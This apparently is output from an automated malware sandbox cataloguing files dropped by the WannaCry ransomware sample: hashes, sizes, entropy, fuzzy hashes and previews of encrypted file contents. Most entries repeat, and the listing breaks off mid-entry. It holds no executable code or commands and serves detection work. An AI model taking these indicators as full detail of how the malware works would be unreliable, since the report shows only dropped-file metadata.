                                                                              MD5:43C49E8DA54B666264EA00F2682D7EEA
                                                                              SHA1:BBCE6BEA6989B886E31BA38C842F912E42CACD6D
                                                                              SHA-256:CD71EF26DCFE86CCFE224B36565CB19448652B354DC43EE8DC0613D8006697D6
                                                                              SHA-512:249119FCD058509B10FB0EC6B3505087E07CCA03BEF079AC761072773091DA1D079E95C04166F487381725625D217D5945B2F752D9153C2ED83F67EC1EF5778C
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....u.$m.ifD.U..D..3..$..W.../jd.}V.j....=....z.#.._...2....Q._o`...9.bD..(.YX|m.....-.........`.....V........q..F..Q...rB.FpA..u..4..9E.:...o..&.3.......d.x..7...\m7..=$..D}a.M*.F.'iqc.]4..g.P..H.g..#.../..J(.G.cz<.G...Y.#....X.{.a...ht.....Y@......).......l`....:.....]...F.I...p.Ug.".-2!......A.41~..Zu.X.......O...}.....|...$.....t..'..\...q.!..rT....{S.c.k.%.....S.G.&.93*.\5.(:.SZ.EFA.-JHu.L>.1..uhsPw.'e.q.i......|v.+.......S..w..=...@._.;&j...MuT....r....?....../G....H..1r.<.p.....6.yo..2}..g...6.q.>[. ..P..\...<..i..2.!JGOCQ.......K...fD.......Z.c]G..e.).qs..S..O..%...R.s.!.0.j......zU.....hCs.a..T..j.vyEO;..uTC.~.a.c.z..$y..eg.!&<...2.T...QLx1.L.3r....MG..._'hC.$".RC.....[d.Z..._...,..9.J....J..#......"....2d....G..=\E1.?..cl...B.f.2..%...Ll...MsFJm.CUG......&/......-A[W.x9..@/aR.X..kn...o0a.A7....mr.Q.2WA.`......u...."..]R#..<.?..5=......K>.M.......\_..F...h.....a'.-..D.F.e..h%.z..RHIDp.T..X.......T.;.to.+...m.P.8.hi...a.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1864
                                                                              Entropy (8bit):7.8780865939023315
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkKBSjPF9PFcAIDNJO8yLMjgQXRWCZyMwKcgwhBYKCJYF:oKUN9n+gig8wMtc5hSdS
                                                                              MD5:43C49E8DA54B666264EA00F2682D7EEA
                                                                              SHA1:BBCE6BEA6989B886E31BA38C842F912E42CACD6D
                                                                              SHA-256:CD71EF26DCFE86CCFE224B36565CB19448652B354DC43EE8DC0613D8006697D6
                                                                              SHA-512:249119FCD058509B10FB0EC6B3505087E07CCA03BEF079AC761072773091DA1D079E95C04166F487381725625D217D5945B2F752D9153C2ED83F67EC1EF5778C
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....u.$m.ifD.U..D..3..$..W.../jd.}V.j....=....z.#.._...2....Q._o`...9.bD..(.YX|m.....-.........`.....V........q..F..Q...rB.FpA..u..4..9E.:...o..&.3.......d.x..7...\m7..=$..D}a.M*.F.'iqc.]4..g.P..H.g..#.../..J(.G.cz<.G...Y.#....X.{.a...ht.....Y@......).......l`....:.....]...F.I...p.Ug.".-2!......A.41~..Zu.X.......O...}.....|...$.....t..'..\...q.!..rT....{S.c.k.%.....S.G.&.93*.\5.(:.SZ.EFA.-JHu.L>.1..uhsPw.'e.q.i......|v.+.......S..w..=...@._.;&j...MuT....r....?....../G....H..1r.<.p.....6.yo..2}..g...6.q.>[. ..P..\...<..i..2.!JGOCQ.......K...fD.......Z.c]G..e.).qs..S..O..%...R.s.!.0.j......zU.....hCs.a..T..j.vyEO;..uTC.~.a.c.z..$y..eg.!&<...2.T...QLx1.L.3r....MG..._'hC.$".RC.....[d.Z..._...,..9.J....J..#......"....2d....G..=\E1.?..cl...B.f.2..%...Ll...MsFJm.CUG......&/......-A[W.x9..@/aR.X..kn...o0a.A7....mr.Q.2WA.`......u...."..]R#..<.?..5=......K>.M.......\_..F...h.....a'.-..D.F.e..h%.z..RHIDp.T..X.......T.;.to.+...m.P.8.hi...a.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1848
                                                                              Entropy (8bit):7.897198691859319
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkE+4g0kDe+OaHlaYcqxqHBcDYcsaGx1oAW5xA6m6:oL4ZiHQhhcDYcsF/WTA16
                                                                              MD5:068810761B763A0C87E76CD209EF8DAC
                                                                              SHA1:8A11F4458A4C6F4143A1B12D3F9B50CCFA2B0D54
                                                                              SHA-256:CB1ADEAF508C88C52C7AD591A97B2F92EB1CA6C89D485253E563181C1F309D41
                                                                              SHA-512:7A7B2354F791C43C5D98F49E90C7160B9A1122E18204220A74987B183755826EBFCA727139FE8CF3AF8EFF6EAA643126C50F79D4D20195A141D0A1CB0078A134
                                                                              Malicious:false
                                                                              Preview:WANACRY!....R".GT.b.\=.S]f.O.8....A.i...q#...+....1.Gr...R.....i.9..G....X._H.k.N.#.4.4E.I.V....H0..\.<w...n.Nh....XL...F.@....pE.5V....:.EnzL.Y.....}.....a..VO..`.].zd.;.%qb...._..W.".t..Z.#du..S...po..=..j."....q.Fx..,kl......q..t...u...u.bT...3.cKk.............<.&..;.8.>$.GKP.|..33.Iab..7W..)+......2x..5....h.....`hK.....M)Y*.R.2 ..2....p.6....p......t........@G..%.._.".I.`.T9..'..Ea.......C...L.x..N.h7Q.u..a\...&=N...l......e.*..g...Z..=...Zg__y.>...a..g.[C...Zu...I..5...#.n..'..7..VIv..O..Q.R....K.CAMi.].4......Ss..k...$......X.<.[..p.....Q.2q.........U.C..Z...p.Y....W6z............%&..s~b_.aQ...2A.x.\Q.x.d.-^....1.Y.5N$.1..&./eu..Y...Gi....lg0E.i.m...&..I......x.bX.u.=...=.'e...CL^d..=.U$K.]$....S.G...?...$oB......#..3.-Nt..y.C..![>.m".T<.(e2...`. .vy.&.i..@....I.z...y..../.R...m..D.....C`...?1.L..1y(.UKrh.x..`.uAF@.|v."i.R......m..$iV.4Y.}....O.f.Q.. .x.).M_]...o|...U....}..Q.+5.K.X.R{..d.....T3J.8..N..........h.."..@.l%N..=....k...5.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1848
                                                                              Entropy (8bit):7.897198691859319
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkE+4g0kDe+OaHlaYcqxqHBcDYcsaGx1oAW5xA6m6:oL4ZiHQhhcDYcsF/WTA16
                                                                              MD5:068810761B763A0C87E76CD209EF8DAC
                                                                              SHA1:8A11F4458A4C6F4143A1B12D3F9B50CCFA2B0D54
                                                                              SHA-256:CB1ADEAF508C88C52C7AD591A97B2F92EB1CA6C89D485253E563181C1F309D41
                                                                              SHA-512:7A7B2354F791C43C5D98F49E90C7160B9A1122E18204220A74987B183755826EBFCA727139FE8CF3AF8EFF6EAA643126C50F79D4D20195A141D0A1CB0078A134
                                                                              Malicious:false
                                                                              Preview:WANACRY!....R".GT.b.\=.S]f.O.8....A.i...q#...+....1.Gr...R.....i.9..G....X._H.k.N.#.4.4E.I.V....H0..\.<w...n.Nh....XL...F.@....pE.5V....:.EnzL.Y.....}.....a..VO..`.].zd.;.%qb...._..W.".t..Z.#du..S...po..=..j."....q.Fx..,kl......q..t...u...u.bT...3.cKk.............<.&..;.8.>$.GKP.|..33.Iab..7W..)+......2x..5....h.....`hK.....M)Y*.R.2 ..2....p.6....p......t........@G..%.._.".I.`.T9..'..Ea.......C...L.x..N.h7Q.u..a\...&=N...l......e.*..g...Z..=...Zg__y.>...a..g.[C...Zu...I..5...#.n..'..7..VIv..O..Q.R....K.CAMi.].4......Ss..k...$......X.<.[..p.....Q.2q.........U.C..Z...p.Y....W6z............%&..s~b_.aQ...2A.x.\Q.x.d.-^....1.Y.5N$.1..&./eu..Y...Gi....lg0E.i.m...&..I......x.bX.u.=...=.'e...CL^d..=.U$K.]$....S.G...?...$oB......#..3.-Nt..y.C..![>.m".T<.(e2...`. .vy.&.i..@....I.z...y..../.R...m..D.....C`...?1.L..1y(.UKrh.x..`.uAF@.|v."i.R......m..$iV.4Y.}....O.f.Q.. .x.).M_]...o|...U....}..Q.+5.K.X.R{..d.....T3J.8..N..........h.."..@.l%N..=....k...5.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1400
                                                                              Entropy (8bit):7.850974690849969
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk9Q6f9zIlFJ1gljGOx0UxSOHG7/xz4GkZyz28Q1DXF3owTDSo4uQm/:bk9QmzIzJWlr09zrkZpeu9
                                                                              MD5:B14773FD5E0BE5BFD63446B6E903E291
                                                                              SHA1:A14FB6FB44446C25EC015F126E7FC73956A1DA45
                                                                              SHA-256:5666E0B177DF6EAE22C5C5509E29EF3CB1C8D06F1C002CB8F8387EE1167390E5
                                                                              SHA-512:C8FD722892C399DC15151746D6555D7831F152E693E4104A5B48098951D5477BE0B81B7D86C19A4C65AB467D1A0231058A6EA079A5F423EA50D8F93F0DA85281
                                                                              Malicious:false
                                                                              Preview:WANACRY!....2.^......}\....n,.4..0..m~.......h.....l$...n.....T.W...2...3..<..c...ph5..C..|...@..Q.}..Q/.j-qO8.oe.V....>[c.+.X.$a.)..=...B...6.....(.x..a...VB../.....U ..?t,..l.....=\.Z...]..q.....g.%y....<.R.@\AiZq..x.)....(.....UH.|.H....`..... .R+?....Y.......6..A6.{....d.......!.@.....Q..u..Y.O..Pw./\+...E..H...~.t...]U.N.ql.E.e/J.3.(..r.s...X..O......DF.........L8.~....]l...S... ..*5....W.......*.!.:}...@ZH./T...;.Y.S...j.....wT.....I..T.Q...N...NZB.2...he .GU.9.Fc....kP4E........l.M..........).PG..."..H....(....)-..h92#....+W.......[(-g=.9..xx.."m...!.W..C...?4...2W5.Ok4....9?A..?..b..n....kL1.{.H&r..k#.R..qTs.&4...;'n......_>D6.`... m........A..........-....Q.h...cV.lC.!....S.;].......g._...-[.F.ym.......*...W..........H.yx~..CN....JG#qm.t..h:P..)..S@j...R.Fa3....+..J.J...y..._kL..X.....t.tm.cSy.....50P.W.%..sV..cE.....:O..V..5 .q}...0.B(...0..}...1s......5:...m.D..;...~.IJ...N......t...=...l...-..$$...E.s..5.g.....S.k
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1400
                                                                              Entropy (8bit):7.850974690849969
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk9Q6f9zIlFJ1gljGOx0UxSOHG7/xz4GkZyz28Q1DXF3owTDSo4uQm/:bk9QmzIzJWlr09zrkZpeu9
                                                                              MD5:B14773FD5E0BE5BFD63446B6E903E291
                                                                              SHA1:A14FB6FB44446C25EC015F126E7FC73956A1DA45
                                                                              SHA-256:5666E0B177DF6EAE22C5C5509E29EF3CB1C8D06F1C002CB8F8387EE1167390E5
                                                                              SHA-512:C8FD722892C399DC15151746D6555D7831F152E693E4104A5B48098951D5477BE0B81B7D86C19A4C65AB467D1A0231058A6EA079A5F423EA50D8F93F0DA85281
                                                                              Malicious:false
                                                                              Preview:WANACRY!....2.^......}\....n,.4..0..m~.......h.....l$...n.....T.W...2...3..<..c...ph5..C..|...@..Q.}..Q/.j-qO8.oe.V....>[c.+.X.$a.)..=...B...6.....(.x..a...VB../.....U ..?t,..l.....=\.Z...]..q.....g.%y....<.R.@\AiZq..x.)....(.....UH.|.H....`..... .R+?....Y.......6..A6.{....d.......!.@.....Q..u..Y.O..Pw./\+...E..H...~.t...]U.N.ql.E.e/J.3.(..r.s...X..O......DF.........L8.~....]l...S... ..*5....W.......*.!.:}...@ZH./T...;.Y.S...j.....wT.....I..T.Q...N...NZB.2...he .GU.9.Fc....kP4E........l.M..........).PG..."..H....(....)-..h92#....+W.......[(-g=.9..xx.."m...!.W..C...?4...2W5.Ok4....9?A..?..b..n....kL1.{.H&r..k#.R..qTs.&4...;'n......_>D6.`... m........A..........-....Q.h...cV.lC.!....S.;].......g._...-[.F.ym.......*...W..........H.yx~..CN....JG#qm.t..h:P..)..S@j...R.Fa3....+..J.J...y..._kL..X.....t.tm.cSy.....50P.W.%..sV..cE.....:O..V..5 .q}...0.B(...0..}...1s......5:...m.D..;...~.IJ...N......t...=...l...-..$$...E.s..5.g.....S.k
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1736
                                                                              Entropy (8bit):7.88443658435412
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkOgxjv7qekf3MJYrT0WQgIvqs8xCjs343KwRWFP37YZJSHwwpdapZg5/XaCU/Hd:bkOUDdofrT0WfOsCD6kWBCU5PhO
                                                                              MD5:D697232102875FA04E8FFC0568B461DC
                                                                              SHA1:2BBED6C0A8AD363D6EDFC93596061AF17D21A5CC
                                                                              SHA-256:5A93BB44DDC0C442C754544C1E3A2C5E4C1285FED63F8BC1E0E3F5A7832E78B4
                                                                              SHA-512:C7B94C2F46DF909C053F0DDD74F78B0ED478158FD6113823BE0C1CE897629AB2A79EEC9C852A761D4BE0194659F53D42FDB6635185CDAA78D0A3C5DA3DEC6C4C
                                                                              Malicious:false
                                                                              Preview:WANACRY!....1..~..qyN.@.1.c..VF.40..0.$@c.B....)..#.-.w.....F....c.0:&..N .q..'4D.......].6..T..'..9.............J..a(6%.7K...p....k.,=...TO..M...........y..22...[....7...J.7.T..4.4...%..."......6..W..<t.xzJm.M.2@..........Z.`C.i.0..V.f..y+.......*.PV..............K.).|ah,.y.....t..`.S...+B.,....zae.....`../.T{EpjN@.sV{+\jJ.._.A.....b*.J.e..Z..O...}v....c..!.c..g.7..7..c.\.2...&..V.|.?_........pW..muk..2:.<.....Z...w.c>.G.*O...)....Cx.(_..-.r.8.L[j....".YQ.k0R.....>!"x......k..}.....|.4.C;....u.-...rx..f%...+8.....DG..^_./.yc(..Yz....w.."...... ~.BE?.d..b.%...5..........nCLj..5=...e.S.).i?#.O=....{..z^....F..`...ui.....!ic..w.@F.^-$....e.;.)..H..Q.S.._Z.r_..B.z......e.o.....6s.f.Q.|-.O..s.1.tF~...Lg....$8W.......2RVYAG.^.KwW.[.y.....>........3..E>...YH....H....C...*.%m..xG\>..mx...........ys5.iot.-<.t...Y..o~n2...ex....C.!..d."...h......#...SK3gB..k..J.6K8......<..8<..R..SUq:.t.iK.......$...h.p.....(.~..".....2z."..........p^....I7.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1736
                                                                              Entropy (8bit):7.88443658435412
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkOgxjv7qekf3MJYrT0WQgIvqs8xCjs343KwRWFP37YZJSHwwpdapZg5/XaCU/Hd:bkOUDdofrT0WfOsCD6kWBCU5PhO
                                                                              MD5:D697232102875FA04E8FFC0568B461DC
                                                                              SHA1:2BBED6C0A8AD363D6EDFC93596061AF17D21A5CC
                                                                              SHA-256:5A93BB44DDC0C442C754544C1E3A2C5E4C1285FED63F8BC1E0E3F5A7832E78B4
                                                                              SHA-512:C7B94C2F46DF909C053F0DDD74F78B0ED478158FD6113823BE0C1CE897629AB2A79EEC9C852A761D4BE0194659F53D42FDB6635185CDAA78D0A3C5DA3DEC6C4C
                                                                              Malicious:false
                                                                              Preview:WANACRY!....1..~..qyN.@.1.c..VF.40..0.$@c.B....)..#.-.w.....F....c.0:&..N .q..'4D.......].6..T..'..9.............J..a(6%.7K...p....k.,=...TO..M...........y..22...[....7...J.7.T..4.4...%..."......6..W..<t.xzJm.M.2@..........Z.`C.i.0..V.f..y+.......*.PV..............K.).|ah,.y.....t..`.S...+B.,....zae.....`../.T{EpjN@.sV{+\jJ.._.A.....b*.J.e..Z..O...}v....c..!.c..g.7..7..c.\.2...&..V.|.?_........pW..muk..2:.<.....Z...w.c>.G.*O...)....Cx.(_..-.r.8.L[j....".YQ.k0R.....>!"x......k..}.....|.4.C;....u.-...rx..f%...+8.....DG..^_./.yc(..Yz....w.."...... ~.BE?.d..b.%...5..........nCLj..5=...e.S.).i?#.O=....{..z^....F..`...ui.....!ic..w.@F.^-$....e.;.)..H..Q.S.._Z.r_..B.z......e.o.....6s.f.Q.|-.O..s.1.tF~...Lg....$8W.......2RVYAG.^.KwW.[.y.....>........3..E>...YH....H....C...*.%m..xG\>..mx...........ys5.iot.-<.t...Y..o~n2...ex....C.!..d."...h......#...SK3gB..k..J.6K8......<..8<..R..SUq:.t.iK.......$...h.p.....(.~..".....2z."..........p^....I7.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1352
                                                                              Entropy (8bit):7.838018521019542
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkwpdY7c3BgvifU/lpescT4ExtZY+fuZdQn+kf7Htsj0eFUgtv5VbGSM80V8vUmQ:bkmdY7GgvhlpbExj3+kf7Htsj0eFUg9G
                                                                              MD5:30716958DC8F52E4D469E93E26A9BAB4
                                                                              SHA1:8B5D3A1FF6B348B49D81CC880C2E2E93BB3D9DB7
                                                                              SHA-256:76D88331FF63CB3E86C8542DE637E058CB2A000C94AB678EBBBF248174B52CC4
                                                                              SHA-512:C158A28E2E00667EF5D859E867CA26E4A29973BAF1AC33B7187B9D45144BD81C2230FA0AA323BDEE00463DA841D57E70D3EFA507562144F9A78A53B2E95BC2AE
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....F.".A...c....s.U...R...=. ..u..u..].....i.Tx..{g..f.....i.r..Ev0"../B,F.`.......=x...P.Iq...T..m..8.t..)..R.I...@....W<.w..<...s.l+8.>...d......+..';R.-.....Nh...n|}.....T.|.8. ............E.!z'x..3n1....5(.2...".c@..O&,:)+...-.Q/V.xZ@.=......$........Y.i.?G.!z15K.H.bU0:..kndY..<Y..j..&y...n ...]..F0.6-v7..D"..Y.!..;.|....-....8&.../..!..*.A[...P...Fc..f....S...*pR.,.J.<MV..".Y....%.R.......y..S.@.~%.._pN....n._M.r.y.-p.....l....?!.NGL.hN\...{a.E]I.....m...j....A.....l......-4.~.^.(.M..%....GE.i<..e.Zl..)...A....c....P.._....}.-X..}0..Gv..6.N.....Cq.E.k&..g...........(...P3...77)...$.(d.#.(i!......^=.....f...Ex..2..*'..<x.;.y..<..Qh.a....B.Z....f.....Q(.;H.\.....$E.Jf.~w.../..CN.Ai....9..0....O.<.s.......mkE..G..Z.-.fn.q.....Te......&......IH.o...)a.1.e/m.}Qd...H.v....hJ.....75e.l..|..?.cm..6....2<,0.H.Qz......d.S.nf......4(..+x....l.@.......L9O/...P=.....A|,..S.<H.g.q.a.................ji6B.w=y.R.....9G.S..\...J.....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1352
                                                                              Entropy (8bit):7.838018521019542
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkwpdY7c3BgvifU/lpescT4ExtZY+fuZdQn+kf7Htsj0eFUgtv5VbGSM80V8vUmQ:bkmdY7GgvhlpbExj3+kf7Htsj0eFUg9G
                                                                              MD5:30716958DC8F52E4D469E93E26A9BAB4
                                                                              SHA1:8B5D3A1FF6B348B49D81CC880C2E2E93BB3D9DB7
                                                                              SHA-256:76D88331FF63CB3E86C8542DE637E058CB2A000C94AB678EBBBF248174B52CC4
                                                                              SHA-512:C158A28E2E00667EF5D859E867CA26E4A29973BAF1AC33B7187B9D45144BD81C2230FA0AA323BDEE00463DA841D57E70D3EFA507562144F9A78A53B2E95BC2AE
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....F.".A...c....s.U...R...=. ..u..u..].....i.Tx..{g..f.....i.r..Ev0"../B,F.`.......=x...P.Iq...T..m..8.t..)..R.I...@....W<.w..<...s.l+8.>...d......+..';R.-.....Nh...n|}.....T.|.8. ............E.!z'x..3n1....5(.2...".c@..O&,:)+...-.Q/V.xZ@.=......$........Y.i.?G.!z15K.H.bU0:..kndY..<Y..j..&y...n ...]..F0.6-v7..D"..Y.!..;.|....-....8&.../..!..*.A[...P...Fc..f....S...*pR.,.J.<MV..".Y....%.R.......y..S.@.~%.._pN....n._M.r.y.-p.....l....?!.NGL.hN\...{a.E]I.....m...j....A.....l......-4.~.^.(.M..%....GE.i<..e.Zl..)...A....c....P.._....}.-X..}0..Gv..6.N.....Cq.E.k&..g...........(...P3...77)...$.(d.#.(i!......^=.....f...Ex..2..*'..<x.;.y..<..Qh.a....B.Z....f.....Q(.;H.\.....$E.Jf.~w.../..CN.Ai....9..0....O.<.s.......mkE..G..Z.-.fn.q.....Te......&......IH.o...)a.1.e/m.}Qd...H.v....hJ.....75e.l..|..?.cm..6....2<,0.H.Qz......d.S.nf......4(..+x....l.@.......L9O/...P=.....A|,..S.<H.g.q.a.................ji6B.w=y.R.....9G.S..\...J.....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):5096
                                                                              Entropy (8bit):7.965272666886119
                                                                              Encrypted:false
                                                                              SSDEEP:96:o8AY8LZxmttY+2wJW3+aB7t/abkX7dsnS2Rqo59G4I0K97/AuE+GC:zkZxmL2euN7GO72SEPnG4kbH5
                                                                              MD5:28E974C93381BA2E8E34344FB0E78EFB
                                                                              SHA1:0D060FCB987E2D88AF7F56B5CB4880C5967A0185
                                                                              SHA-256:8F89D1FBF5E9AAE3583A610078F0F66FE8F308A457C413B014D593DE34B78966
                                                                              SHA-512:0FC9A2B9900908A282E6F819DA7FCBCB931D22A033F8D8C4A1948A703A91CC969F553F92E2A31B89DFC08BBCDC252D5728CB8B62C9ACD6F126B3F31F9E6E6D46
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....wS.h.......-!.G6..s.G..^..}.{.+Y.:`.......S"{..M..%.X.F....O.T..'92..#..I.K..t..7;..B...q.KX....._...'..d..K.-h..~@.P-+N...<.A...S.......q5...=m[].[c#...y...._e...d....$,.....p.....E.T[j.h...,b.V..."f....TA.Q.....#%V...7^h..W.`.5CH....9'.B...b............%..U.f.4..........+.0i/.-I...e1....C..%..#m.ff@&.......b.Y+'b.S....o..g...)...!;.~.4..(....z...M...F..@.P..h./......L..9f..k..._Q.!Y.H...)~.......EV).B..D...8./.K..}.PX.1.@.T..y......8...Y.......wz.#...>.U......N.....>. ..t.....y..(.."Y`d.....^%....h!Y.wC.....7...a.S.H=;....J{^.....:...y.#...............(.,&........Dd~.1&$hhU..."P.........M..%...x..~..S~d..\J...R..n...[$.W.u.~.i.6K....b.1.k.@...>{3{. .....l...ZQ.6...4J9.)..`@...J.K.4..Z5.>.6J.....V...o.B.qc..bDST..".......P..Hw.h.4I...d+..IA..UE..2....l..?..t.1......H...k...I..^......a.b.....i..q.u..z.%..5.n....p.h......=5S...X#.{....8A...a.y..D....@.......V...!.tv..C.|e.....L.b.L.......wb.~.(2}.$W.5.(d..{.X...j...Y..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):5096
                                                                              Entropy (8bit):7.965272666886119
                                                                              Encrypted:false
                                                                              SSDEEP:96:o8AY8LZxmttY+2wJW3+aB7t/abkX7dsnS2Rqo59G4I0K97/AuE+GC:zkZxmL2euN7GO72SEPnG4kbH5
                                                                              MD5:28E974C93381BA2E8E34344FB0E78EFB
                                                                              SHA1:0D060FCB987E2D88AF7F56B5CB4880C5967A0185
                                                                              SHA-256:8F89D1FBF5E9AAE3583A610078F0F66FE8F308A457C413B014D593DE34B78966
                                                                              SHA-512:0FC9A2B9900908A282E6F819DA7FCBCB931D22A033F8D8C4A1948A703A91CC969F553F92E2A31B89DFC08BBCDC252D5728CB8B62C9ACD6F126B3F31F9E6E6D46
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....wS.h.......-!.G6..s.G..^..}.{.+Y.:`.......S"{..M..%.X.F....O.T..'92..#..I.K..t..7;..B...q.KX....._...'..d..K.-h..~@.P-+N...<.A...S.......q5...=m[].[c#...y...._e...d....$,.....p.....E.T[j.h...,b.V..."f....TA.Q.....#%V...7^h..W.`.5CH....9'.B...b............%..U.f.4..........+.0i/.-I...e1....C..%..#m.ff@&.......b.Y+'b.S....o..g...)...!;.~.4..(....z...M...F..@.P..h./......L..9f..k..._Q.!Y.H...)~.......EV).B..D...8./.K..}.PX.1.@.T..y......8...Y.......wz.#...>.U......N.....>. ..t.....y..(.."Y`d.....^%....h!Y.wC.....7...a.S.H=;....J{^.....:...y.#...............(.,&........Dd~.1&$hhU..."P.........M..%...x..~..S~d..\J...R..n...[$.W.u.~.i.6K....b.1.k.@...>{3{. .....l...ZQ.6...4J9.)..`@...J.K.4..Z5.>.6J.....V...o.B.qc..bDST..".......P..Hw.h.4I...d+..IA..UE..2....l..?..t.1......H...k...I..^......a.b.....i..q.u..z.%..5.n....p.h......=5S...X#.{....8A...a.y..D....@.......V...!.tv..C.|e.....L.b.L.......wb.~.(2}.$W.5.(d..{.X...j...Y..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):80360
                                                                              Entropy (8bit):7.997788802666035
                                                                              Encrypted:true
                                                                              SSDEEP:1536:d1WMuKvSJ8KmGJ7PuH+1ziZFXQTv0Nsj0K5c9tluDeE5a6iJ3GzGf:dFImEPue1zGVWrsNbp3GzGf
                                                                              MD5:1E43F02A4D182A8DF636E1253D375ECB
                                                                              SHA1:50C6EEBADC56ED8DB1A0A8E2E6A320AE08D904BE
                                                                              SHA-256:9527A826A5FAFFC4187CE7837B8135EAD0F5FF0529B360DE5B3F28A5AE7B24D9
                                                                              SHA-512:4D267F5521CBE5AA446FDBC010D7D2BD67EA1EFF4AB30B0F92DBC2923DFE0DEEA495F33B39749D71982E9D74E7AC11737F1E463934525B76C2CD1ED78FDD3678
                                                                              Malicious:true
                                                                              Preview:WANACRY!....J....`.ro...T..}........j...]K..#.a...pV{..v9.3...J.....G.o.U....1...p....7..D......R.N...V...{._..,.\....@,.V..u?6....'...z..^.%.9....;.G.)..j[..r|...;KNAp..(.A.x.]..*.x..G.\.'....*......7z...k...]..0[c*.a......L.X.{E.$.O.&..u..*g.....8......p..*<:..G..[.....\[.eCS[......}....25.u..G.$.....A...B....p.?.k.[....bj..&J..H..T......_#k...5..p......T..Hc...S1A.......2&~s.+Q......J.*.v4r.....rI...$..9.u5.jn.......x...h.]*.U..S..._7.?...].(L.Z0zu6...W)e..B...4..uy...1.I.|.......a.0x_"...!\.L..........X...-.{V.......s.ERVW..IR..S..Mm\m...L...5.E...k..E.7........ue....L..W.H.Dt.w.o...L...(^).A^.TZq,7U...}..T..=]Kb.N...]....H.lh7............'.z9.....1R...u..V5....{..,|$3Uq.] _....v.I...].q.}.....|3Fgd..&.!..4-..y..?>_.K#G.h........P.C.Y}U..{...)Pe....E.x.~...~.zh....\..<y.i.f.].n;.;.vK......{....l.u..3".$."..aZO|&O.B._..v.=r:.-...3..C>.v.....A.....~A.t."..`-$5.3JD...Es..s...@..p9.YQ..J..e&.IS.D.ts!..~..-..dPK}.d}..j..D.\.v..A....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):80360
                                                                              Entropy (8bit):7.997788802666035
                                                                              Encrypted:true
                                                                              SSDEEP:1536:d1WMuKvSJ8KmGJ7PuH+1ziZFXQTv0Nsj0K5c9tluDeE5a6iJ3GzGf:dFImEPue1zGVWrsNbp3GzGf
                                                                              MD5:1E43F02A4D182A8DF636E1253D375ECB
                                                                              SHA1:50C6EEBADC56ED8DB1A0A8E2E6A320AE08D904BE
                                                                              SHA-256:9527A826A5FAFFC4187CE7837B8135EAD0F5FF0529B360DE5B3F28A5AE7B24D9
                                                                              SHA-512:4D267F5521CBE5AA446FDBC010D7D2BD67EA1EFF4AB30B0F92DBC2923DFE0DEEA495F33B39749D71982E9D74E7AC11737F1E463934525B76C2CD1ED78FDD3678
                                                                              Malicious:true
                                                                              Preview:WANACRY!....J....`.ro...T..}........j...]K..#.a...pV{..v9.3...J.....G.o.U....1...p....7..D......R.N...V...{._..,.\....@,.V..u?6....'...z..^.%.9....;.G.)..j[..r|...;KNAp..(.A.x.]..*.x..G.\.'....*......7z...k...]..0[c*.a......L.X.{E.$.O.&..u..*g.....8......p..*<:..G..[.....\[.eCS[......}....25.u..G.$.....A...B....p.?.k.[....bj..&J..H..T......_#k...5..p......T..Hc...S1A.......2&~s.+Q......J.*.v4r.....rI...$..9.u5.jn.......x...h.]*.U..S..._7.?...].(L.Z0zu6...W)e..B...4..uy...1.I.|.......a.0x_"...!\.L..........X...-.{V.......s.ERVW..IR..S..Mm\m...L...5.E...k..E.7........ue....L..W.H.Dt.w.o...L...(^).A^.TZq,7U...}..T..=]Kb.N...]....H.lh7............'.z9.....1R...u..V5....{..,|$3Uq.] _....v.I...].q.}.....|3Fgd..&.!..4-..y..?>_.K#G.h........P.C.Y}U..{...)Pe....E.x.~...~.zh....\..<y.i.f.].n;.;.vK......{....l.u..3".$."..aZO|&O.B._..v.=r:.-...3..C>.v.....A.....~A.t."..`-$5.3JD...Es..s...@..p9.YQ..J..e&.IS.D.ts!..~..-..dPK}.d}..j..D.\.v..A....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1212760
                                                                              Entropy (8bit):7.999860400458235
                                                                              Encrypted:true
                                                                              SSDEEP:24576:4QXw8DwATjpDJ1OQeYaErGKSXZWtXjxJb97RM/+3TmnRcpwYR4N:JACwAftHQEjSJYXj/b9M+jSRcpwYQ
                                                                              MD5:2883D29628018808C0F4303AC8C3877B
